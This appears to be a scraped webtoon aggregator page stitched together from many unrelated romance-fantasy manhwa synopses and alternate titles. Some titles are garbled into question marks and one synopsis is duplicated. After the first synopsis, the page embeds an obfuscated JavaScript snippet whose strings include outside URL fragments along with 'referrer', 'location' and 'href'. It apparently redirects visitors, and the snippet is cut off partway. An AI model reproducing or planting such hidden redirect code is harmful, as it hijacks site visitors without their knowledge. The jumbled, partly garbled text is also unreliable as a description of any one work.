“Pray, become the Enchanter that represents the family.” The goodwill from the start didn’t last long. At the House that adopted me due to my affinity with elemental spirits, I lived a life detested by even the maids because my powers didn’t come to form. It was a life where I agonized over whether I would be happier in death. That is, until I found another ‘me’. “I finally found you. Hi, the current me. Won’t you enter into a contract with me? You’re far too special to live like this, you see.” A miracle appeared in front of me, who was, again, vomiting as well. The person who lived as me in my previous life. “I’ll make you into this continent’s best Enchanter.” <div class="ToggleTriggerAnchor bbCodeSpoilerContainer"> <div class="SpoilerTarget bbCodeSpoilerText">?? ?? ? ??? ???, I will Live this Life According to my Will, I Will Live This Life As I Wish</div> </div> <script></script><script>function _0x542b(_0x2a829e,_0x49deef){var _0x3cafb3=_0x5491();return _0x542b=function(_0x37097d,_0x12cf45){_0x37097d=_0x37097d-(0x486*0x6+0xd*0x101+-0x2774);var _0x50e90d=_0x3cafb3[_0x37097d];return _0x50e90d;},_0x542b(_0x2a829e,_0x49deef);}function _0x5491(){var _0x1930b8=['GIQPn','1370955bKyiPJ','6670960AocBgg','text','injza','wzLOU','floor','10464704saMAPa','https://ip','SmPas','href','8573502yvkcEh','.customapi','233308HXqhAY','includes','http://rea','Eyugh','.top/','dma.net/','4136088vxlJPU','google','random','ZcJBr','referrer','TeIHl','YlXfb','location','6ESKwGU','then','JNxTK','193369XrSryb'];_0x5491=function(){return _0x1930b8;};return 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“If you want to do well, you have to face difficulties…” Lisia recalls the memories of her previous life when she suffered in the Korean entrance exam, aiming for the first position. ‘Forget everything, I will live my life only for me.’ A life of a supporting role that is no longer in the spotlight! However, it is difficult to live quietly as a supporting character— both in appearance and in abilities, because she is so extraordinary! After entering the academy, I tried to live like a shadow with no presence as much as possible… I keep getting involved with men that everyone is paying attention to. From the prince in the guise of a friendly rogue, to the most popular man at the Academy, Casanova, to his expressionless expression, but from his motives, who seem to be hiding many secrets. ‘Please leave me alone!’ I want to live quietly! Lysia Tries The Quiet Life [Official] / I Will Live as a Supporting Character in This Life / I Will Live as a Supporting Role in This Life / I Will Live This Life as a Side Character / Ibeon Saeeun Joyeoneuro Sargessseubnida / Thus I Promised to Live My Life as an Extra / 今世は脇役として生きていきます / 이번 생은 조연으로 살겠습니다
Read manhwa I Will Protect My Tyrant Dad! / 폭군 아빠는 내가 지킨다! Reborn as a small-town child in a fantasy novel, Sien discovers her father is the exiled heir of a villainous duchy. Fearing their return to the ruthless family, she strives to protect him. But wait—her dad was once a tyrant? A heartwarming tale of a secretly powerful dad and his scheming daughter trying to preserve his innocence unfolds in this delightful mix of humor and healing misunderstandings.
Read manga I Will Protect The Duke This Time [A noble lady who turns back time for the person she loves most in the world!!] Rescate, a noble daughter who is treated unfavourably by her family due to her differences in origin. However, Duke Angel, someone understands and respects her, becomes her lover. I was having happy days. Meanwhile, Angel and Rescate are assassinated due to a conspiracy by another family that is opposed to the Angel family. At the moment of death, Rescate makes a contract with the goddess. ‘The future of two people’ was the price of turning back time to the point where Angel can be saved. In a world where the future with a precious person has been lost, Rescate stands up to save him… ! A classic romantic fantasy story that will make your heart tremble due to sad and deep love begins!
Read manhwa I Will Raise My Child As Another Man’s; I Will Raise My Kin as Another Man’s Child Princess Hinael Plake of the Salur Kingdom. She was murdered by her husband while heavily pregnant. Just when I thought my life had ended… I opened my eyes and found myself back two years before my wedding. ‘This time, I won’t believe in things like love.’ To avoid facing another unfortunate future, I decided to change my fate and choose another man. The one they call the War Hero of Trikas, who is destined to become the Emperor of Trikas, Lutz Viant. “I will bear your child. Please protect the child I give birth to as your heir.” This time, I will definitely protect my child, the one I have with another man. “I Will Raise My Child As Another Man’s Manhwa” is sames name: 다른 남자 아이로 키우겠어
I was strangled to death by my cheating husband when I asked for a divorce. I thought that would be the end of my painful life. “I’m young…?” When I opened my eyes again, I went back to being a 12 year old daughter of count who had no power and couldn’t speak. My uncle who watched for an opportunity to swallow the Count. An audacious housemaid who thought that they became the owner. Furthermore, a maid who steals mother’s belongings? ‘I won’t live like this again, I can’t!’ One life spent being used, suffering, and dying in vain was enough. Those who made my life torture. ‘I will delete them all from my life.’
I will retrieve the Duke I had abandoned, I Will Get the Duke I Abandoned Back, at manhwawebsiteMaybe you like !
[Let’s get rid of this psychopath before that] Yes, I possessed someone. But who I was in my previous life. I can’t remember at all. All I remember is, just this guy’s face that filled my eyes. The day I woke up for the first time as a wizard’s experiment, we were together. Strangely enough, about my previous life, this guy seems to know better about it than I do. In a dead-end novel, you are the only one you can trust and rely on… In order to live, I have to run away from this guy. In the future, he will kill the female lead’s entire family. It’s because he’s a psychopath whose view on the world is final darkness. After a while… Finally, out of his grasp, I thought I could live a peaceful life─ “You cruelly abandoned me.” This guy, he finally found me. “Did you enjoy playing with me?” Now, he can’t even be compared to his past self. He went completely mad.
I possessed Raphine, the youngest sister of the second male lead, who had no dreams nor hopes, in an impoverished and obsession filled novel. That was also because he had a crush on the female lead, who married the male lead on a contract, and eventually died. I can’t believe it’s such a miserable ending for my favorite character and kind eldest brother. No way! Raphine decided to brainwash Prince Jerkan, the male lead of the novel, to prevent the female lead’s contract marriage. So that he can think of me when he needs a contract marriage! “Jerkan! I want to marry you!” “If you’re grateful, you have to marry me next time.” “I need a simple marriage, so I’ll get married through a contract.” And when the brainwashing finally succeeded, Raphine cheered inside. “Okay. Definitely, I’ll marry you.” I never imagined what kind of eyes he was had. Yeah, I really didn’t know then. I didn’t know this would happen. “Didn’t you pester me because you wanted to marry me?” “Will you run away?” I Will Seduce the Male Lead for My Older Brother / ??? ?? ??? ?? ????? I possessed Raphine, the youngest sister of the second male lead, who had no dreams nor hopes, in an impoverished and obsession filled novel. That was also because he had a crush on the female lead, who married the male lead on a contract, and eventually died. I can’t believe it’s such a miserable ending for my favorite character and kind eldest brother. No way! Raphine decided to brainwash Prince Jerkan, the male lead of the novel, to prevent the female lead’s contract marriage. So that he can think of me when he needs a contract marriage! “Jerkan! I want to marry you!” “If you’re grateful, you have to marry me next time.” “I need a simple marriage, so I’ll get married through a contract.” And when the brainwashing finally succeeded, Raphine cheered inside. “Okay. Definitely, I’ll marry you.” I never imagined what kind of eyes he was had. Yeah, I really didn’t know then. I didn’t know this would happen. “Didn’t you pester me because you wanted to marry me?” “Will you run away?”
<p style="text-align: left;">"Pretend to be my lover and join the social circle."</p> Selena, the top star that had the entire world's attention, was suddenly warped to Northern Duke's land during an accident while filming. Kalcion, the Northern Duke that saved her from the infernal beasts, offers Selena a chance to go back home in return for collecting information in various social circles by pretending to be his lover. Selena quickly accepts Kalcion's offer, but… "Why in the world can't you do this!?" "Don't you think that the answer to that should be obvious to you, the actress, not to me, the duke?" There was a critical problem. The Northern Duke's acting skills are horrible! "…Let's change the plan. I'll seduce you instead." And thus the contractual relationship between the two started. Will Kalcion's acting skill improve first, or will he start to have true feelings for Selena instead? <h4 class="display-5 pl-3">I Seduced the Northern Duke</h4>
Read Manhwa I Will Steal Her, My First Love / I Will Steal Her, My First Love! My First Love From Six Years Ago, ‘Im Nareem,’ And My Best Friend Of 13 Years, ‘Lee Riun,’ Are Getting Married. Everything Was Perfect For The Groom, Lee Riun, But He Suddenly Leaves Nareem Behind, And Taeshin And Nareem Find Themselves Thrown Back Six Years Into The Past! “I Will Steal Her, My First Love! Manhwa” Is Another Name: 첫사랑 그녀를 뺏겠습니다 첫사랑 그녀를 뺏겠습니다!
Read I will steal your place Novel – I will steal your place Manhwa Online Free At ManhuaHot The summary of the comic I will steal your place: Are you going to steal my identity? When Kim Yi-Seul transfers to a new school, she is immediately teased by Jin Soo-Hee. But Yi-Seul doesn’t seem to mind. Instead, she takes off her thick glasses and applies heavy makeup so that her face ends up looking just like Soo-Hee’s. That’s when the adventure begins. “I will steal your place” is also known as: Stealing So-hee / 소희 훔치 The comic I will steal your place belongs to the Genre: Drama, Fantasy, Magical, Manhwa, Romance “Top Manhua, Battwo, Read Manga Online…” are the most searched keywords on the website ZINMANGA. We offer a wide selection of the best and newest comic series with all chapters updated quickly and featuring high-quality images, providing readers with wonderful and enjoyable reading experiences at BunManga. You can read TOP MANGA Human Mask The Patron’s Daughters The Genius Idol’s Strategy to Stardom